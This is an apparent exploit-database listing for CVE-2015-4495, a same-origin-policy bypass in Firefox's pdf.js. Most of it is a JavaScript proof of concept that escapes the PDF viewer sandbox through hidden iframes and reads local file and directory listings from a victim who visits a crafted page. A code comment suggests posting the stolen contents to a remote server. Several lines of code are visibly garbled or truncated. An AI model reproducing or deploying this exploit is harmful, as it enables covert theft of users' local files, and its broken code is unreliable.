Firefox < 39.03 - pdf.js Same Origin Policy Exploit

Credit: In Ming Loh
Risk: Low
Local: No
Remote: Yes
CWE: CWE-200

Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

/* # Exploit Title: Firefox < 39.03 pdf.js same origin policy exploit # Date: 13-08-2014 # Vendor Homepage: # Software Link: # Version: 39.0 [Should work version before 39.0.3] # Tested on: Linux (Ubuntu 14.04.3 LTS) [Should probably work in OSX] # CVE : 2015-4495 # POC code taken from 1. Description This exploit allow attacker to read and copy information on victim's computer, once they view the web site crafted with this exploit. 2. Proof of Concept Create a index.html and copy and paste the following html into it: <!DOCTYPE html> <html> <head> <title>CVE-2015-4495</title> </head> <body> <h1>Test</h1> <script type="text/javascript" src="./exploit.js" charset="utf-8"></script> </body> </html> Run the index.html (Make sure the main.js is in the same directory) and we should be able to see the directory listing. 3. Solution Upgrade to the latest firefox ( > 39.0.3) */ var start_timeout=2000; var sandbox_context_i=null; var DIR_CACHE={}; var FILE_CACHE={}; var hidden=true; var my_win_id=null; function start() { i=document.getElementById("i"); i2=document.getElementById("i2"); if(typeof sandboxContext!=='undefined') { clearInterval(intVal); var os = navigator.platform; if ("Mac") > -1 ||"Linux") > -1) { // NOTE: Replace the following root directory into any directory of your // choice. Can make it an array and loop through it. get_dir("/", function(data) { // nothing to do here... }); } } } function parse_directory_listing(dir, data) { var pattern = '<tbody><tr><td><a class='; var start = 0; var listing = 'Listing:\n'; while ((start = >= 0) { var d = data.substring(start + pattern.length + 1), end ='>'), f = d.substring(0, end); f = f.split(' '); var t = f[0].substring(0, f[0].length-1); var n = f[1].substring(6, f[1].length-1); listing += ' [' + t + '] ' + dir + '/' + n + '\n'; data = d.substring(end); } // NOTE: Replace with some other useful stuff. Eg: Read the file and do a post // request to send all the content to a remote server. alert(listing); } function get_dir(dir,callback,internal) { get(dir,function() { data=get_data(this); var dir=location.href.toString(); dir=dir.replace(/^file\:\/\//i,''); dir=decodeURIComponent(dir); parse_directory_listing(dir, data); }, 500, "%target_dir%", dir); } function xml2string(obj) { return new XMLSerializer().serializeToString(obj); } function _(s,template,value) { s=s.toString().split(/^\s*function\s+\(\s*\)\s*\{/)[1]; s=s.substring(0,s.length-1); if(template&&value) s=s.replace(template,value); s+=parse_directory_listing; s+=__proto; s+=xml2string; s+=get_data; s=s.replace(/\s\/\/.*\n/g,""); s=s+";undefined"; return s; } function __proto(obj) { return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__; } function get_data(obj) { data=null; try { data=obj.document.documentElement.innerHTML; if (data.indexOf('dirListing') < 0) { throw new Error(); } } catch(e) { if (this.document instanceof XMLDocument) { data=xml2string(this.document); } else { try { if (this.document.body.firstChild.nodeName.toUpperCase()=='PRE') { data=this.document.body.firstChild.textContent; } else { throw new Error(); } } catch(e) { try { if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') >- 1 ) { return null; } else { throw new Error(); } } catch(e) { ; } } } } return data; } function get(path,callback,timeout,template,value){ callback = _(callback); if(template && value) callback = callback.replace(template,value); proto_prefix="file://"; var invisible_code=""; js_call1='javascript:'+invisible_code+_(function(){ try { open("%url%","_self"); } catch(e) { history.back(); } undefined; }, "%url%", proto_prefix+path); js_call2='javascript:' + invisible_code + ';try{updateHidden();}catch(e){};' + callback + ';undefined'; sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l =,'location');, window.wrappedJSObject.js_call1); })); setTimeout((function() { sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l =,'location');,window.wrappedJSObject.js_call2); })); }), timeout); } function get_sandbox_context() { if(my_win_id==null) { for(var i=0;i<20;i++) { try { if(window[i].location.toString().indexOf("view-source:")!=-1) { my_win_id=i;;break; } } catch(e) {} } }; if(my_win_id==null) return; clearInterval(sandbox_context_i);'view-source:' + blobURL; window[my_win_id].location='data:application/x-moz-playpreview-pdfjs;,';'data:text/html,<html/>'; window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe onload="' + _(function() { window.wrappedJSObject.sandboxContext = (function(cmd) { with(importFunction.constructor('return this')()) { return eval(cmd); } }); }) + '"/>'); } function setup_plugin() { var i = document.createElement("iframe"); = "i"; i.width = 1; i.height = 1; i.src = "data:application/xml,<" + "?xml version=\"1.0\"?><e><e1></e1></e>"; i.frameBorder = 0; document.documentElement.appendChild(i); i.onload=function() { if(this.contentDocument.styleSheets.length>0) { var i2 = document.createElement("iframe");"i2"; i2.src="data:application/pdf,"; i2.frameBorder=0; if(!hidden) { i2.width="100%"; i2.height="700px"; } else { i2.width=1; i2.height=1; } document.documentElement.appendChild(i2); pdfBlob=new Blob([''], { type:'application/pdf' }); blobURL = URL.createObjectURL(pdfBlob); object = document.createElement('object');'data:application/pdf,'; if(hidden) {'none'; object.width=1; object.height=1; } object.onload = (function() { sandbox_context_i = setInterval(get_sandbox_context,200); object.onload=null;'view-source:' + location.href;return; }); document.documentElement.appendChild(object); } else { this.contentWindow.location.reload(); } } } setTimeout(function() { setup_plugin(); intVal = setInterval(start, 150); }, start_timeout);

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top